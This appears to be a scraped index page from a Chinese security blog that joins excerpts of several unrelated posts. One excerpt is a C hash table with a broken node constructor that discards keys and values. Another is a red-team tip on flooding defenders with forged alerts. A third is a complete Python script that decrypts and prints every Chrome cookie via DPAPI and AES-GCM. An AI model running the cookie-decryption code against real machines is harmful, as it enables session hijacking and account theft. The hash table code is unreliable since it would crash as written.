数据结构
273
1 #include <stdlib.h>
#include <string.h>
#include <stdio.h>
typedef struct hash_node {
void *key;
void *val;
struct hash_node *next;
} hash_node;
typedef struct hash_table {
hash_node **table;
int size;
// hashmask https://its301.com/article/qing_gee/120260024
int sizemask;
} hash_table;
unsigned int hash_33(char *str) {
unsigned int hash = 5381;
while (*str) {
hash += (hash << 5) + (*str++);
}
return (hash & 0x7FFFFFFF);
}
hash_table *hash_table_create() {
hash_table *hashTable = (hash_table *) malloc(sizeof(hash_table));
if (hashTable == NULL) return NULL;
hashTable->size = 1024;
hashTable->sizemask = hashTable->size - 1;
// 申请1024个节点内存,可以看作是数组
hashTable->table = (hash_node **) malloc(sizeof(hash_node *) * (hashTable->size));
if (hashTable->table == NULL) return NULL;
//数组元素置零
memset(hashTable->table, 0, sizeof(hash_node *) * (hashTable->size));
return hashTable;
}
//这个节点相当于是单链表
hash_node *hash_node_create(void *key, void *val) {
hash_node *hashNode = (hash_node *) malloc(sizeof(hash_node));
if (hashNode == NULL) return NULL;
hashNode->next = NULL;
hashNode->val = NULL;
hashNode->key = NULL;
return hashNode;
}
hash_table *hash_table_insert(hash_table *hashTable, void *key, void *val) {
unsigned int hash = hash_33(key);
int pos = hash & hashTable->sizemask;
hash_node *hashNode = hash_node_create(key, val);
hashNode->next = hashTable->table[pos];
hashTable->table[pos] = hashNode;
return hashTable;
}
void *get_val(hash_table *hashTable, void *key) {
unsigned int hash = hash_33(key);
int pos = hash & hashTable->sizemask;
if (hashTable->table[pos] == 0) return NULL;
hash_node *current = hashTable->table[pos];
while (current) {
if (hash_33(current->key) == hash_33(key)) {
return current->val;
} else {
current = current->next;
}
}
return NULL;
}
int main() {
hash_table *hashTable = hash_table_create();
hash_table_insert(hashTable, "test1", "dsafasdfads");
puts(get_val(hashTable, "test1"));
return 0;
}
windows evtx日志解析
在溯源过程中使用Log Parser,Event Log Explorer之类的工具需要熟悉工具的语法,有的还要收费,遇到大文件打开还会卡死
攻
154
1 hw的时候防守方都是几百号人对几支攻击队,加上内网一大堆告警设备有些烦
一个恶心流量设备的小方法,可以通过伪造告警,耗尽防守方体力
攻
243
1 chrome解密
"""
1:获取local state文件位置
2:获取加密的key(base64编码)
3:DPAPI解密
4:ase-gcm解密
5:解析sqllite文件
"""
import os
import json
import base64
import win32crypt
import sqlite3
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
def AESGCM_decode(key, data):
# 5.ase-gcm解密
nonce, cipherbytes = data[3:15], data[15:]
aesgcm = AESGCM(key)
plainbytes = aesgcm.decrypt(nonce, cipherbytes, None)
plaintext = plainbytes.decode('utf-8')
return plaintext
def get_key():
# 1.获取key
LocalState = os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State") # 密钥文件
with open(LocalState, 'r', encoding='utf-8') as f:
s = json.load(f)['os_crypt']['encrypted_key']
# 2.解密base64
encrypted_key_with_header = base64.b64decode(s)
# print(encrypted_key_with_header)
# 3.去除头5位的DPAPI
encrypted_key = encrypted_key_with_header[5:]
key = win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
return key
def get_cookie():
Cookies = os.path.join(os.environ['USERPROFILE'],
r'AppData\Local\Google\Chrome\User Data\default\Cookies') # cookie文件
con = sqlite3.connect(Cookies)
res = con.execute('select host_key,name,encrypted_value from cookies').fetchall()
con.close()
key = get_key()
for i in res:
print(i[2])
print(i[0], i[1], AESGCM_decode(key, i[2]))
if __name__ == '__main__':
get_cookie()
代码审计方法论
一、定义
软件代码审计是在一个编程中对源代码旨在发现错误、安全漏洞或违反编程约定的项目。它是防御性程序设计范例,它试图在软件发布之前减少错误。C、C++、php源代码是最常见的审计代码,因为许多高级语言,如Python,具有较少的潜在易受攻击的函数(例如,不检查边界的函数)——维基百科